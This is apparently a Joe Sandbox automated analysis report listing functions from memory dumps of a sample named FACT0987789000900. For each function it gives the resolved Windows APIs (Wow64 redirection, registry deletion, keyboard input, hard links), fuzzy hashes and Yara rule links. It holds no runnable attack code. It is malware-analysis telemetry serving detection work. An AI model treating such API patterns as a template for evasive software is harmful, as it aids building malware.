Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 01605ea07477826b81b6e32303f7313fa97987ba2395325f52d229c3275b4b40
Instruction ID: 5eb62cfce39cddb1782e795f5c537c330d723ae523e6877bc7a22db45687f730
Opcode Fuzzy Hash: 01605ea07477826b81b6e32303f7313fa97987ba2395325f52d229c3275b4b40
Instruction Fuzzy Hash: 00D0A734840726AFD7254F30F9086D27AE8FB14304F01885EE841E2290E7B4D884DA70

Function 004942F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,004942EC,?,004942AA,?), ref: 00494304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00494316

Strings

kernel32.dll, xrefs: 004942FF
Wow64RevertWow64FsRedirection, xrefs: 00494310

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: ba147e5d8c9eeda2c50b1e5a4b7c248cb66754bb73912cd0e5a487edf5dfca79
Instruction ID: 53f026b001b53d12a4f6a5a9677ae91a28ea15bdd8b36de8a793b6d44303dc7f
Opcode Fuzzy Hash: ba147e5d8c9eeda2c50b1e5a4b7c248cb66754bb73912cd0e5a487edf5dfca79
Instruction Fuzzy Hash: 63D0A730540722AFCB344F30E80CE827EE8BB18305F00842AE841D2260D7B4D884CA20

Function 0049434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,004941BB,00494341,?,0049422F,?,004941BB,?,?,?,?,004939FE,?,00000001), ref: 00494359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0049436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 00494365
kernel32.dll, xrefs: 00494354

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 3a71b37ae4f46434c30acf97e88ba1d78f313e60660aa5c1db53c12b10650966
Instruction ID: fb69a552d2c330c83c1f53e79a8c95a111dc1bcce87b6fd33b7f5e71f7ba65b3
Opcode Fuzzy Hash: 3a71b37ae4f46434c30acf97e88ba1d78f313e60660aa5c1db53c12b10650966
Instruction Fuzzy Hash: 60D0A730544722AFCB344F30E808A867EE8BB70719F00842AE881D2250D7B4D884CA20

Function 004D0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,004D052F,?,004D06D7), ref: 004D0572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 004D0584

Strings

oleaut32.dll, xrefs: 004D056D
UnRegisterTypeLibForUser, xrefs: 004D057E

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 6b8d2642344857b1e0e5be013fab7210c27d497111af21f89ec3fd414df901c5
Instruction ID: 6073907816734f0c239cc25ad196589c0dbd6e7353cfc480cb90434f3fa80316
Opcode Fuzzy Hash: 6b8d2642344857b1e0e5be013fab7210c27d497111af21f89ec3fd414df901c5
Instruction Fuzzy Hash: BED09E70944722BAD7209F65A819B827BF4AB14715F90891BEC55D2350E674D488CA60

Function 004D0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,004D051D,?,004D05FE), ref: 004D0547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 004D0559

Strings

oleaut32.dll, xrefs: 004D0542
RegisterTypeLibForUser, xrefs: 004D0553

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: ebeaabbb26c2c2f7ce9339dafd712644fbd88fd9a55c061ef1d142f5c21f7124
Instruction ID: 0abcf62d9cf6b7b9fb45dad2aaacf0ce58f598a67132105768cc2fefc724080d
Opcode Fuzzy Hash: ebeaabbb26c2c2f7ce9339dafd712644fbd88fd9a55c061ef1d142f5c21f7124
Instruction Fuzzy Hash: 6FD09E70544722BED720DB65A8196827AB4AB14755FD0C41BE856D2350E674C888CA60

Function 004EECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,004EECBE,?,004EEBBB), ref: 004EECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 004EECE8

Strings

kernel32.dll, xrefs: 004EECD1
GetSystemWow64DirectoryW, xrefs: 004EECE2

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 0ae6a0887708aa9aee97914db5bcc5f341e51dd8e4ab88312e050f5729fe66fd
Instruction ID: 6a6a6c0d18d3a209053136e960b8febd54c7157cb3305c3a2322541429810554
Opcode Fuzzy Hash: 0ae6a0887708aa9aee97914db5bcc5f341e51dd8e4ab88312e050f5729fe66fd
Instruction Fuzzy Hash: CBD0A770440733AFCB245F72E8487837AF8BB10305F10C41AF84AD2250DB74C884DA20

Function 004EBADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,004EBAD3,00000001,004EB6EE,?,0052DC00), ref: 004EBAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 004EBAFD

Strings

kernel32.dll, xrefs: 004EBAE6
GetModuleHandleExW, xrefs: 004EBAF7

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 5beb2661f6b2d5596052c39c220defd02a098f155426968ee0066804ba60bd76
Instruction ID: 1f443724e961bc10fd8ea420737ea05d156f6b7db10009e16a762550348afb2a
Opcode Fuzzy Hash: 5beb2661f6b2d5596052c39c220defd02a098f155426968ee0066804ba60bd76
Instruction Fuzzy Hash: 9FD0A730840B22EFC7349FA1E84CB937AECFB10305F00841AE847D2650D774D884DA64

Function 004F3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,004F3BD1,?,004F3E06), ref: 004F3BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004F3BFB

Strings

advapi32.dll, xrefs: 004F3BE4
RegDeleteKeyExW, xrefs: 004F3BF5

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: d0541434c30246dad9d9e1a87015bfeaed8f8e46207d4a6a476b9ffa702fbb39
Instruction ID: a814dba3a226c49df88c67194bb4993eba612eda3f490a5081236dc1a08e16fa
Opcode Fuzzy Hash: d0541434c30246dad9d9e1a87015bfeaed8f8e46207d4a6a476b9ffa702fbb39
Instruction Fuzzy Hash: 77D0A7F1480756AFC7205F60E808793BEF4BB11319B11841AE445E2250D6B4C484CE20

Function 004C9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5c9905c3dce90ab002b26af8044c6ef39a3f1075789d86a6e3a6d586bbf1713
Instruction ID: 9a70059eb4e1a67efaf5336f9b9f4e2fd5c4c1d6ccf180d636997e7f43272af9
Opcode Fuzzy Hash: f5c9905c3dce90ab002b26af8044c6ef39a3f1075789d86a6e3a6d586bbf1713
Instruction Fuzzy Hash: FDC13A79A0021AEBCB54CF94C888FAEB7B5FF48704F10459DE906AB291D734EE41DB94

Function 004EAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004EAAB4
CoUninitialize.COMBASE ref: 004EAABF

Part of subcall function 004D0213: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 004D027B

VariantInit.OLEAUT32(?), ref: 004EAACA
VariantClear.OLEAUT32(?), ref: 004EAD9D

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 06949ba232a77abd11a9a972b05484aecc6762e9df530bc915f923a91cd07264
Instruction ID: 88708d4f9403dd185235571a3c7cea86fc8c899d1e9a9c411690176f3b790a19
Opcode Fuzzy Hash: 06949ba232a77abd11a9a972b05484aecc6762e9df530bc915f923a91cd07264
Instruction Fuzzy Hash: 13A148352047419FCB10DF26C881A1AB7E5BF98315F14845EFA969B3A1CB39FD05CB8A

Function 004C91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004C91DD
SysAllocString.OLEAUT32(?), ref: 004C9286
VariantCopy.OLEAUT32 ref: 004C92B5
VariantClear.OLEAUT32(?), ref: 004C92DC

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 0bed6eb8de13429f941b3a5287414bc0484d26afbe4b0f26fdb7c8e9f2d187f2
Instruction ID: d03f457ee589836ae8b54fbd148e2532de90cbeb91257d17b52d092a7d3e3b74
Opcode Fuzzy Hash: 0bed6eb8de13429f941b3a5287414bc0484d26afbe4b0f26fdb7c8e9f2d187f2
Instruction Fuzzy Hash: C451B738700342FBDB649F66D499F6EB3A5AF59314B20882FE946C72E1DB789C41870D

Function 004FC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(01325CC8,?), ref: 004FC544
ScreenToClient.USER32(?,00000002), ref: 004FC574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 004FC5DA

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 3b87575b8697faf3523ce85df2329abf6b178ef5cdd620ffcaca0e7d5ac41981
Instruction ID: c51a34ca086f1c88bc6aabdb4f801716ccd29aa7ef34101f16476b6fcbf842d2
Opcode Fuzzy Hash: 3b87575b8697faf3523ce85df2329abf6b178ef5cdd620ffcaca0e7d5ac41981
Instruction Fuzzy Hash: 23513B7590020CAFDF10DF68C9C0ABE7BB6AB55324F10865AFA559B290D734ED41CB94

Function 004CC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 004CC462
__itow.LIBCMT ref: 004CC49C

Part of subcall function 004CC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 004CC753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 004CC505
__itow.LIBCMT ref: 004CC55A

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 24a3669fe9e4c70938160946b6f24beaeaef1d826191e95da911ffecc4394ec3
Instruction ID: 1c1bad71509ea9d94b5b36f7d8963d37fb0fe6142a1e8a5730ff0298f21a8091
Opcode Fuzzy Hash: 24a3669fe9e4c70938160946b6f24beaeaef1d826191e95da911ffecc4394ec3
Instruction Fuzzy Hash: AD41EB35A002187FDF15DF55C892FEE7BB5AF44704F00406EF509A3281D7789A45CBA9

Function 004D390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 004D3966
SetKeyboardState.USER32(00000080,?,00000001), ref: 004D3982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004D39EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 004D3A4D

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 1f78b11ff6e76dbd29acf1417e186b4ffa146e08a62c5160da8d696ee9050132
Instruction ID: b1190ac401324f63c7531a6661e44ebf7ba1a11e44a22ef5c53d1a9cf0557104
Opcode Fuzzy Hash: 1f78b11ff6e76dbd29acf1417e186b4ffa146e08a62c5160da8d696ee9050132
Instruction Fuzzy Hash: 824129B0A04208AAEF208F6598397FEBBB59B55312F04419BF4C1523C1C7BC9E85D76B

Function 004DE698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004DE742
GetLastError.KERNEL32(?,00000000), ref: 004DE768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004DE78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004DE7B9

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: cae7004cfe91313b5e50292cf08f814fb431afc24258d4e3d04c5033320cb76c
Instruction ID: f4e594d473d7863915cc7a4aed2177f83dfe070cdfb9e579ae41caf9116182cf
Opcode Fuzzy Hash: cae7004cfe91313b5e50292cf08f814fb431afc24258d4e3d04c5033320cb76c
Instruction Fuzzy Hash: F6414939600610DFCF11EF2AC54594DBBE5BF59714B09849AE9069F362CB79FC00CB99

Function 004FB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004FB5D1

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: abaefb8a884f4e1c261f242b3c1b283daef2250745c45a525c6f3b5dd6e2815e
Instruction ID: e5a86026a9297175a52915cfad19921d18eaeae6c9b5c7fcc490cb164b4b0cd3
Opcode Fuzzy Hash: abaefb8a884f4e1c261f242b3c1b283daef2250745c45a525c6f3b5dd6e2815e
Instruction Fuzzy Hash: 4A31B07460020CBBEF208B18CC85FBA7B65EB07354F648513FB11D62E1C73CA9409ADA

Function 004FD7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 004FD807
GetWindowRect.USER32(?,?), ref: 004FD87D
PtInRect.USER32(?,?,004FED5A), ref: 004FD88D
MessageBeep.USER32(00000000), ref: 004FD8FE

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
